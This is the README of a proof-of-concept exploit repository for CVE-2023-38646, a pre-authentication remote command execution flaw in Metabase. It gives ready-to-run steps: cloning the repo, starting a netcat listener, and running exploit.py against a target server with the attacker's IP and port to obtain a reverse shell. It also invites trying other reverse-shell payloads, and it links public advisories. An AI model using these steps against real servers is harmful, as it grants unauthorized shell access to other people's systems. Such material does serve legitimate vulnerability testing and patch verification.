# CVE-2023-38646 PoC
## Description
This is a Proof of Concept (PoC) script for exploiting Metabase, an open-source business intelligence and data analytics tool. Metabase allows users to visualize and interact with their data, making it a powerful platform for data analysis.
This vulnerability, designated as CVE-2023-38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication. The impact of this flaw was severe, as it granted unauthorized access to the server at the server's privilege level.
## Proof of Concept (PoC) Steps
<img src="poc.png" alt="" >
**Clone this Repository**
```bash
git clone https://github.com/threatHNTR/CVE-2023-38646.git
```
**Navigate to the Repository**
```bash
cd CVE-2023-38646
```
**Before running the script, set Up a Netcat Listener**
```bash
nc -nlvp chosen-port
```
**Run the Script**
```bash
python3 exploit.py -u http://target-metabase-server -i your-ip-address -p chosen-port
```
**Exploitation**: The script will attempt to send a reverse shell to the target Metabase server. If successful, you will receive a shell on your machine. Feel free to change the payload to try different reverse shells.
## References
- GitHub Advisory: https://github.com/advisories/GHSA-jg32-8h6w-x7vg
- Metabase Advisory: https://www.metabase.com/blog/security-advisory
- Metabase GitHub: https://github.com/metabase/metabase
- Assetnote Blog - Chaining our way to Pre-Auth RCE in Metabase: https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
[4.0K] /data/pocs/046758a92881ebcd05e5080458abecc8ff0ef67e
├── [4.4K] exploit.py
├── [ 85K] poc.png
└── [1.5K] README.md
0 directories, 3 files